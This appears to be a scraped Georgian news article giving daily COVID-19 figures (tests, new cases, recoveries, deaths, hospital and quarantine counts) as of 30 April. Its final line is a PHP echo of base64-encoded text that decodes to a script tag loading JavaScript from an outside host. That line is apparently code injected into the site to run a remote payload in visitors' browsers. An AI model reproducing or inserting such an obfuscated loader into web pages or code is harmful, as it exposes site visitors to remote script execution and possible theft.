celsiusi
ავერსი საქკაბელი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 20 129 კვლევა ტესტით, მათ შორის 6 667 კვლევა ანტიგენის ტესტით და 13 462 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 1 147 ახალი დადასტურებული შემთხვევა. ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს 311 457-ს.
 
რაც შეეხება დადებითობის მაჩვენებელს, 30 აპრილის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 5.70%, ბოლო 14 დღის მანძილზე - 4.87%, ხოლო 7 დღის მანძილზე - 5.13%.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 690 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა - 291 457-მდე.
ბოლო 24 საათში კორონავირუსით გარდაცვალების 20 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 4 130 პირი ემსხვერპლა.
 
დღეს ქვეყანაში გამოვლენილი ინფიცირების 1 147 ახალი შემთხვევიდან: 653 თბილისში გამოვლენილია. 
 
ამ ეტაპზე ინფიცირების მიმდინარე აქტიური შემთხვევა არის 15 844, საიდანაც: 3 919 ადამიანი მკურნალობს საავადმყოფოში. აქედან, მძიმე პაციენტად ითვლება 743 პირი, ხოლო ხელოვნური სუნთქვის აპარატზე 144 პირი იმყოფება. 
 
11 175 პირი ვირუსის მკურნალობის კურსს  საცხოვრებელ ბინაზე გადის. საკარანტინე სივრცეებში მოთავსებულია 96 ადამიანი, მათ შორის.
 
სულ 6 ოქტომბრიდან - 30 აპრილის პერიოდში, სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში გადაყვანილია - 24 567პირი. თვითიზოლაციაში იმყოფება 33 203 ადამიანი.
 
 
 
 
1221
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");